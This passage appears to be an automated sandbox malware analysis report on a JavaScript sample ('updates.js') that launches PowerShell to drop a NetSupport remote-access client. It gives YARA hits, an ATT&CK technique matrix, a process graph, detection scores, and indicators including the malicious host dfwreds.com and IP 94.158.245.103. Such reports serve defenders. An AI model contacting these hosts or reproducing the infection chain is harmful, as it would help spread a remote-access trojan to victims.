                                Source: Yara matchFile source: 00000008.00000002.1988466728.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2968386737.0000000000952000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.1988422325.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.1907401442.0000000000952000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.1987638721.0000000000952000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2969282587.00000000037E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.1907824908.0000000001308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000000.1905398866.0000000000952000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2971125252.000000006F160000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.1780896953.0000000000952000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.1816720389.00000170BABCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7424, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7968, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GRDCWLLI20\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GRDCWLLI20\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information12
                                Scripting                                		2
                                Valid Accounts                                		1
                                Windows Management Instrumentation                                		12
                                Scripting                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		1
                                Input Capture                                		2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		1
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API                                		1
                                DLL Side-Loading                                		2
                                Valid Accounts                                		4
                                Obfuscated Files or Information                                		LSASS Memory1
                                Account Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		22
                                Encrypted Channel                                		Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution                                		2
                                Valid Accounts                                		21
                                Access Token Manipulation                                		11
                                Software Packing                                		Security Account Manager3
                                File and Directory Discovery                                		SMB/Windows Admin Shares1
                                Input Capture                                		3
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Command and Scripting Interpreter                                		1
                                Windows Service                                		1
                                Windows Service                                		1
                                DLL Side-Loading                                		NTDS34
                                System Information Discovery                                		Distributed Component Object Model3
                                Clipboard Data                                		4
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts2
                                Service Execution                                		1
                                Registry Run Keys / Startup Folder                                		13
                                Process Injection                                		1
                                Masquerading                                		LSA Secrets141
                                Security Software Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable Media3
                                PowerShell                                		RC Scripts1
                                Registry Run Keys / Startup Folder                                		2
                                Valid Accounts                                		Cached Domain Credentials2
                                Process Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                                Virtualization/Sandbox Evasion                                		DCSync31
                                Virtualization/Sandbox Evasion                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                                Access Token Manipulation                                		Proc Filesystem11
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt13
                                Process Injection                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1474469 Sample: updates.js Startdate: 16/07/2024 Architecture: WINDOWS Score: 100 34 dfwreds.com 2->34 36 geo.netsupportsoftware.com 2->36 48 Snort IDS alert for network traffic 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 54 6 other signatures 2->54 8 wscript.exe 1 1 2->8         started        11 client32.exe 2->11         started        13 client32.exe 2->13         started        signatures3 process4 signatures5 62 Suspicious powershell command line found 8->62 64 Wscript starts Powershell (via cmd or directly) 8->64 66 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->66 68 Suspicious execution chain found 8->68 15 powershell.exe 15 42 8->15         started        process6 dnsIp7 42 dfwreds.com 23.227.193.59, 49730, 80 HVC-ASUS United States 15->42 26 C:\Users\user\AppData\...\remcmdstub.exe, PE32 15->26 dropped 28 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 15->28 dropped 30 C:\Users\user\AppData\...\client32.exe, PE32 15->30 dropped 32 6 other files (5 malicious) 15->32 dropped 44 Found suspicious powershell code related to unpacking or dynamic code loading 15->44 46 Powershell drops PE file 15->46 20 client32.exe 17 15->20         started        24 conhost.exe 15->24         started        file8 signatures9 process10 dnsIp11 38 94.158.245.103, 443, 49731 MIVOCLOUDMD Moldova Republic of 20->38 40 geo.netsupportsoftware.com 104.26.0.231, 49732, 80 CLOUDFLARENETUS United States 20->40 56 Multi AV Scanner detection for dropped file 20->56 58 Contains functionalty to change the wallpaper 20->58 60 Delayed program exit found 20->60 signatures12

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                No Antivirus matches

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLL13%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLL5%ReversingLabs
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICL32.DLL6%ReversingLabs
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\TCCTL32.DLL6%ReversingLabs
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe26%ReversingLabsWin32.Trojan.NetSupport
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\msvcr100.dll0%ReversingLabs
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\pcicapi.dll3%ReversingLabs
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\remcmdstub.exe24%ReversingLabsWin32.Trojan.Generic

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                https://contoso.com/License0%URL Reputationsafe
                                https://contoso.com/0%URL Reputationsafe
                                https://nuget.org/nuget.exe0%URL Reputationsafe
                                http://nuget.org/NuGet.exe0%URL Reputationsafe
                                http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
                                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                                https://go.micro0%URL Reputationsafe
                                https://contoso.com/Icon0%URL Reputationsafe
                                http://www.symauth.com/cps0(0%URL Reputationsafe
                                http://www.symauth.com/rpa000%URL Reputationsafe
                                https://oneget.org0%URL Reputationsafe
                                https://yandex.com/support/browser/security/protection.htmlCopie0%Avira URL Cloudsafe
                                https://yandex.com/support/browser/security/internet-fraud.xml0%Avira URL Cloudsafe
                                http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)0%Avira URL Cloudsafe
                                https://github.com/apache/incubator-echarts/issues/113690%Avira URL Cloudsafe
                                https://yandex.com/support/yabrowser/security/sms-fraud.xml0%Avira URL Cloudsafe
                                http://geo.netsupportsoftware.com/location/loca.asp0%Avira URL Cloudsafe
                                https://yandex.com/safety/?frombrowser=yes?url=$20%Avira URL Cloudsafe
                                https://jsperf.com/try-catch-performance-overhead0%Avira URL Cloudsafe
                                https://yandex.com/safety/?frombrowser=yes?url=$30%Avira URL Cloudsafe
                                https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js0%Avira URL Cloudsafe
                                http://127.0.0.1RESUMEPRINTING0%Avira URL Cloudsafe
                                https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js0%Avira URL Cloudsafe
                                http://%s/fakeurl.htm0%Avira URL Cloudsafe
                                https://jsbench.me/2vkpcekkvw/1)0%Avira URL Cloudsafe
                                https://yandex.uz/support/browser/security/internet-fraud.xml0%Avira URL Cloudsafe
                                https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)0%Avira URL Cloudsafe
                                http://%s/testpage.htm0%Avira URL Cloudsafe
                                https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js0%Avira URL Cloudsafe
                                https://github.com/apache/incubator-echarts/issues/122290%Avira URL Cloudsafe
                                https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight0%Avira URL Cloudsafe
                                http://94.158.245.103/fakeurl.htm0%Avira URL Cloudsafe
                                http://dfwreds.com/data.ph0%Avira URL Cloudsafe
                                http://dfwreds.com0%Avira URL Cloudsafe
                                https://yandex.com/support/browser/security/protection.htmlSafe0%Avira URL Cloudsafe
                                https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf0%Avira URL Cloudsafe
                                https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js0%Avira URL Cloudsafe
                                https://yandex.uz/safety/?frombrowser=yes&url=$20%Avira URL Cloudsafe
                                https://github.com/apache/echarts/issues/142660%Avira URL Cloudsafe
                                https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js0%Avira URL Cloudsafe
                                https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).0%Avira URL Cloudsafe
                                https://oneget.orgX0%Avira URL Cloudsafe
                                https://yandex.uz/support/browser/security/protection.htmlXavfsiz0%Avira URL Cloudsafe
                                https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalsCompositeOperation0%Avira URL Cloudsafe
                                http://0.30000000000000004.com/0%Avira URL Cloudsafe
                                https://yandex.com/safety/?frombrowser=yes&url=$30%Avira URL Cloudsafe
                                https://yandex.com/safety/?frombrowser=yes&url=$10%Avira URL Cloudsafe
                                http://dfwreds.com/data.php?14991100%Avira URL Cloudmalware
                                https://github.com/Pester/Pester0%Avira URL Cloudsafe
                                https://momentjs.com/0%Avira URL Cloudsafe
                                https://yandex.com/safety/?frombrowser=yes&url=$20%Avira URL Cloudsafe
                                http://127.0.0.10%Avira URL Cloudsafe
                                https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/variableCompositeOperation0%Avira URL Cloudsafe
                                https://github.com/ecomfe/zrender/blob/master/LICENSE.txt0%Avira URL Cloudsafe
                                https://yandex.com/support/browser/security/protection.html0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                		104.26.0.231
                                		truefalse
                                  		unknown
                                  dfwreds.com
                                  		23.227.193.59
                                  		truetrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://geo.netsupportsoftware.com/location/loca.aspfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://94.158.245.103/fakeurl.htmfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://dfwreds.com/data.php?14991true
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://github.com/apache/incubator-echarts/issues/11369wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://yandex.com/safety/?frombrowser=yes?url=$3powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://yandex.com/safety/?frombrowser=yes?url=$2powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://yandex.com/support/yabrowser/security/sms-fraud.xmlpowershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://yandex.com/support/browser/security/internet-fraud.xmlpowershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.jswscript.exe, 00000000.00000003.1662763001.000002211256B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.000002211342F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://contoso.com/Licensepowershell.exe, 00000001.00000002.1839088758.00000170CA885000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://yandex.com/support/browser/security/protection.htmlCopiepowershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://jsperf.com/try-catch-performance-overheadwscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://127.0.0.1RESUMEPRINTINGclient32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://jsbench.me/2vkpcekkvw/1)wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://%s/testpage.htmclient32.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://yandex.uz/support/browser/security/internet-fraud.xmlpowershell.exe, 00000001.00000002.1816720389.00000170BB0F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.jswscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://%s/fakeurl.htmclient32.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/apache/incubator-echarts/issues/12229wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.jswscript.exe, 00000000.00000003.1662763001.000002211256B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.000002211342F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flightwscript.exe, 00000000.00000003.1662763001.000002211256B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.000002211342F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://dfwreds.compowershell.exe, 00000001.00000002.1816720389.00000170BBE72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAA33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BBD31000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://dfwreds.com/data.phwscript.exetrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://yandex.com/support/browser/security/protection.htmlSafepowershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://contoso.com/powershell.exe, 00000001.00000002.1839088758.00000170CA885000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1816720389.00000170BC156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1839088758.00000170CA885000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://oneget.orgXpowershell.exe, 00000001.00000002.1816720389.00000170BBE9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdfwscript.exe, 00000000.00000003.1662763001.000002211256B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.000002211342F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://yandex.uz/safety/?frombrowser=yes&url=$2powershell.exe, 00000001.00000002.1816720389.00000170BB0F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.jswscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.jswscript.exe, 00000000.00000003.1662763001.000002211256B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.000002211342F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1816720389.00000170BC156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1839088758.00000170CA885000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.apache.org/licenses/LICENSE-2.0wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BBE9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1816720389.00000170BC0D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1816720389.00000170BC0D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://go.micropowershell.exe, 00000001.00000002.1816720389.00000170BB331000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://github.com/apache/echarts/issues/14266wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://contoso.com/Iconpowershell.exe, 00000001.00000002.1839088758.00000170CA885000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://yandex.uz/support/browser/security/protection.htmlXavfsizpowershell.exe, 00000001.00000002.1816720389.00000170BB0F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://0.30000000000000004.com/wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://127.0.0.1client32.exe, client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.symauth.com/cps0(powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://momentjs.com/wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1816720389.00000170BC0D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://yandex.com/safety/?frombrowser=yes&url=$1powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalsCompositeOperationwscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.symauth.com/rpa00powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
